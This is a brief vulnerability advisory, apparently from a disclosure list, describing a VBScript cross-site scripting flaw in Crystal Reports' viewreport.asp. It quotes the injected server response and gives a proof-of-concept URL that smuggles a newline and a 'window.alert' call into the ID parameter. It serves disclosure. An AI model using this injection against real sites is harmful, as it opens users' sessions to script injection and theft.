- SAP BusinessObjects Crystal Reports viewreport.asp Multiple Parameter XSS
- Description
Cross-site scripting; vbscript rather than javascript. Subsequent page
will contain pop up reading "fsck_cissp". ID, PROMPTEX-SESSION_ID,
PROMPTEX-TO_DATE, PROMPTEX-FROM_DATE, PROMPTEX-YEAR_QTR1,
PROMPTEX-YEAR_QTR2, PROMPTEX-YEAR_QTR3, PROMPTEX-YEAR_QTR4,
PROMPTEX-YEAR_QTR5, PROMPTEX-YEAR_QTR6, PROMPTEX-YEAR_QTR7,
PROMPTEX-YEAR_QTR8, and PROMPTEX-QT parameters affected.
The following is the response:
<SCRIPT LANGUAGE="VBScript">
<!--
Sub window_onLoad()
Page_Initialize()
End Sub
Sub Page_Initialize
On Error Resume Next
Dim webBroker
Set webBroker = CreateObject("CrystalReports11.WebReportBroker.1")
if err.number <> 0 then
window.alert "The Crystal ActiveX Viewer is unable to
create it's resource objects."
CRViewer.ReportName =
"https://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777
<https://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777>
"
window.alert "fsck_cissp"
else
Dim webSource0
Set webSource0 =
CreateObject("CrystalReports11.WebReportSource.1")
webSource0.ReportSource = webBroker
webSource0.URL =
"https://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777
<https://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777>
"
window.alert "fsck_cissp"
webSource0.PromptOnRefresh = True
CRViewer.ReportSource = webSource0
end if
CRViewer.ViewReport
End Sub
-->
</SCRIPT>
- Product
SAP BusinessObjects, Crystal Reports, unknown
- PoC
https://66.240.213.81/some/path/viewreport.asp?url=viewrpt.cwr?ID=7777"%0d%0awindow.alert%20"fsck_cissp^^INIT=actx:connect
- Solution
None
- Timeline
2008-01-23: Vulnerability discovered
2008-02-15: Vendor contact methods unacceptable (paying customers only)